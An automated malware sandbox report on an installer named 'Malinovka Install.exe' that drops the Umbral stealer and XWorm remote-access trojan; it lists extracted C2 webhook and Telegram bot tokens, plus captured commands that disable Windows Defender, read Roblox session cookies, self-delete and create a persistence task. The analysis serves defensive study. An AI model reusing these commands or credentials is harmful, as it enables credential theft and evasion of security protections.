Analysis

  • max time kernel
    146s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    27-04-2024 12:09

General

  • Target

    Malinovka Install.exe

  • Size

    319KB

  • MD5

    f69924b642ac4b9ef1dfacdfd43759a9

  • SHA1

    95da50564c7cbc3749148419c68a08b0f2869ee1

  • SHA256

    d9b248ce98a243a37d33096fc7b1cad784ee77f5920b0bd6618a6690ca426f18

  • SHA512

    2334511265c507d16b3a323c721a392659feb405a5d9fea588146c4ef320261166312c2fcf8f494c4aa342e0b5a9d5da20576ce2d6ae1e3215ee47dcc19f5e07

  • SSDEEP

    6144:48loZMCrIkd8g+EtXHkv/iD4DDUgoOJBiLHaIJtM34b8e1mmiW2brXv5P:7oZRL+EP8DDUgoOJBiLHaIJtMQIL/5P

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1233119648527159317/Az86qBZQwyED_alc1sGO6UWR18PzIJCJX0PM3XdL1VTOwZPXr0B4Rc6-GqAkKUjg4Jn2

Extracted

Family

xworm

C2

phentermine-partial.gl.at.ply.gg:36969

Attributes
  • Install_directory

    %AppData%

  • install_file

    Client.exe

  • telegram

    https://api.telegram.org/bot7080511499:AAGFFOA3S2vvwmEy85SIMhKHrMsAdBoLR2Y

Signatures

  • Detect Umbral payload 3 IoCs
  • Detect Xworm Payload 5 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Xworm

    Xworm is a remote access trojan written in C#.

  • Drops file in Drivers directory 1 IoCs
  • Drops startup file 2 IoCs
  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Malinovka Install.exe
    "C:\Users\Admin\AppData\Local\Temp\Malinovka Install.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:2920
    • C:\Users\Admin\AppData\Local\Temp\Umbral3.exe
      "C:\Users\Admin\AppData\Local\Temp\Umbral3.exe"
      2⤵
      • Drops file in Drivers directory
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2300
      • C:\Windows\system32\attrib.exe
        "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral3.exe"
        3⤵
        • Views/modifies file attributes
        PID:2756
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral3.exe'
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2080
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2972
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1768
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2768
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" os get Caption
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2688
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" computersystem get totalphysicalmemory
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:2412
      • C:\Windows\System32\Wbem\wmic.exe
        "wmic.exe" csproduct get uuid
        3⤵
          PID:1068
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:1800
        • C:\Windows\System32\Wbem\wmic.exe
          "wmic" path win32_VideoController get name
          3⤵
          • Detects videocard installed
          PID:2876
        • C:\Windows\system32\cmd.exe
          "cmd.exe" /c ping localhost && del /F /A h "C:\Users\Admin\AppData\Local\Temp\Umbral3.exe" && pause
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1116
          • C:\Windows\system32\PING.EXE
            ping localhost
            4⤵
            • Runs ping.exe
            PID:560
      • C:\Users\Admin\AppData\Local\Temp\XClient.exe
        "C:\Users\Admin\AppData\Local\Temp\XClient.exe"
        2⤵
        • Drops startup file
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:2760
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XClient.exe'
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:336
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:2336
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Client.exe'
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:2276
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Client.exe'
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:1880
        • C:\Windows\System32\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Client" /tr "C:\Users\Admin\AppData\Roaming\Client.exe"
          3⤵
          • Creates scheduled task(s)
          PID:2860
    • C:\Windows\system32\taskeng.exe
      taskeng.exe {16A5A0CF-D02F-4D23-9C5A-2C8E1182CB1A} S-1-5-21-2297530677-1229052932-2803917579-1000:HKULBIBU\Admin:Interactive:[1]
      1⤵
      • Suspicious use of WriteProcessMemory
      PID:1976
      • C:\Users\Admin\AppData\Roaming\Client.exe
        C:\Users\Admin\AppData\Roaming\Client.exe
        2⤵
        • Executes dropped EXE
        PID:1520
      • C:\Users\Admin\AppData\Roaming\Client.exe
        C:\Users\Admin\AppData\Roaming\Client.exe
        2⤵
        • Executes dropped EXE
        PID:2632

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

      Filesize

      7KB

      MD5

      2ac40f71bb116c3f32983f5d224e1c94

      SHA1

      bf262915d35729dfbfbb6f00b70f69311cd87f49

      SHA256

      1f1c554eb0c90a727e88ddaa5e4e88213ff4443503a30165bf1ffd022565c3e7

      SHA512

      df6e9fcc8cbd480744540db4d9d63234b325b1357f2b3c8ebc1d1cdbe5d259433808bd28b94b3f1b15447e5ad967eff322b92be4780dadc8a74a0de14a034e3f

    • \Users\Admin\AppData\Local\Temp\Umbral3.exe

      Filesize

      229KB

      MD5

      7a902c87a60986f18a6b097712299256

      SHA1

      2c01906a39faa9d27a41e0d3cd84e92410b9c483

      SHA256

      e4e4f9045dc3683a2a69b9c7625f2ff46ed241ff64b47660a039dbc9d34cb0d5

      SHA512

      c8b75b3f0a77d1f84167af3c431e186802ccd5271fc4a361142e0209541de37f5d584d487bf5ea4b4d921e6e3846267fdea9f65cbd71001331bfea08de5425b6

    • \Users\Admin\AppData\Local\Temp\XClient.exe

      Filesize

      80KB

      MD5

      3fc932775533f1bcea180de679a902dd

      SHA1

      3f393d02af4653e34bf5526ec5b6f8d6e4df65e8

      SHA256

      09a15daeebc228706f36a7659284ef673ea72e7a71700a2f73f4f1409486dd6a

      SHA512

      f59d35a6fe5517a5b9a1ec9a07899eef9f48745710196f1824cc79823994d6fba7975da457ee06ec6215f56860680dc0c07412268c2b1c725c4c66611a75a764

    • memory/1520-84-0x0000000000D20000-0x0000000000D3A000-memory.dmp

      Filesize

      104KB

    • memory/2080-20-0x0000000002790000-0x0000000002798000-memory.dmp

      Filesize

      32KB

    • memory/2080-19-0x000000001B640000-0x000000001B922000-memory.dmp

      Filesize

      2.9MB

    • memory/2300-14-0x0000000000B10000-0x0000000000B50000-memory.dmp

      Filesize

      256KB

    • memory/2632-87-0x0000000000F90000-0x0000000000FAA000-memory.dmp

      Filesize

      104KB

    • memory/2760-13-0x0000000000210000-0x000000000022A000-memory.dmp

      Filesize

      104KB

    • memory/2760-88-0x0000000002240000-0x000000000224C000-memory.dmp

      Filesize

      48KB

    • memory/2760-89-0x000000001B4A0000-0x000000001B550000-memory.dmp

      Filesize

      704KB

    • memory/2920-11-0x0000000000400000-0x0000000000457000-memory.dmp

      Filesize

      348KB

    • memory/2972-26-0x000000001B690000-0x000000001B972000-memory.dmp

      Filesize

      2.9MB

    • memory/2972-27-0x0000000002620000-0x0000000002628000-memory.dmp

      Filesize

      32KB